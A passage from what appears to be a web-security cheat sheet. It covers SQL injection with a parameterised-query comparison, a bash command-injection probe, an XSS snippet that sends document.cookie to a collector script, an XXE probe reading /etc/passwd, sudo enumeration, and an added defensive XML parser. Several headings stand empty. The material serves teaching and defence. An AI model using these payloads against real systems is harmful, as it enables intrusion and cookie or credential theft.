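    conn = make_db()
    print("vulnerable   :", login_vulnerable(conn, PAYLOAD, "x"))
    print("parameterised:", login_parameterised(conn, PAYLOAD, "x"))
```

The vulnerable query becomes SELECT username FROM users WHERE username = '' or 1=1--' AND password = 'x' and returns both users; the parameterised one returns nothing for the payload and still works for a real credential pair.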

Bash injection

; echo hi


Test for XSS

var i = new Image();
i.src="" + document.cookie;

The grabcookie.php script would read the cookie URL parameter and write it to a file.

More XSS Payloads

XSS Payloads


Test for XXE

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
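On the receiving side, the probe above is the document an XML endpoint should never hand to a parser that resolves entities. The following added example (not from the original notes) refuses any document carrying a DOCTYPE before parsing and labels the finding more precisely when a SYSTEM or PUBLIC entity is declared; the request bodies are constructed. It is a pre-parse check on the internal DTD subset, not the parser's own entity handling: Python's ElementTree does not fetch external entities itself, but refusing the document outright means the application does not depend on defaults that differ between XML libraries.

```python
"""Reject XML that declares a DOCTYPE or external entities before parsing it.

Added example, not from the original notes. It takes the cheat sheet's XXE
probe (DOCTYPE with a SYSTEM entity pointing at /etc/passwd) as input and
refuses it, while ordinary documents parse normally. The request bodies are
constructed. The check is a pre-parse scan of the internal DTD subset; it is
not the parser's own entity handling.
"""
import re
import xml.etree.ElementTree as ET

XXE_PROBE = """<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>"""

CLEAN = """<?xml version="1.0"?>
<order><item sku="A-1" qty="2"/></order>"""

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)

class UnsafeXML(ValueError):
    pass

def parse_untrusted_xml(data):
    """Parse XML from an untrusted source; raise UnsafeXML on any DOCTYPE.

    Refusing every DOCTYPE (not only ones with SYSTEM/PUBLIC entities) also
    shuts out internal-entity expansion bombs; the ENTITY check only labels
    the finding more precisely.
    """
    if isinstance(data, str):
        data = data.encode()
    if DOCTYPE_RE.search(data):
        kind = "external entity" if ENTITY_RE.search(data) else "DOCTYPE"
        raise UnsafeXML(f"refusing XML with {kind} declaration")
    return ET.fromstring(data)

def rejection_reason(data):
    """None if the document is acceptable, otherwise the reason it was refused."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML as exc:
        return str(exc)
    return None

if __name__ == "__main__":
    print("probe :", rejection_reason(XXE_PROBE))
    print("clean :", rejection_reason(CLEAN), parse_untrusted_xml(CLEAN).tag)
```

Because the scan runs on the raw bytes before any parsing, it cannot be bypassed by entity tricks inside the document; its one limitation is that it also rejects legitimate documents that carry a DOCTYPE, which for an API endpoint accepting untrusted XML is the behaviour you want.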

PHP injection

Test for injection


Run OS command




Find programs that a user can run with sudo

sudo -l -U user_name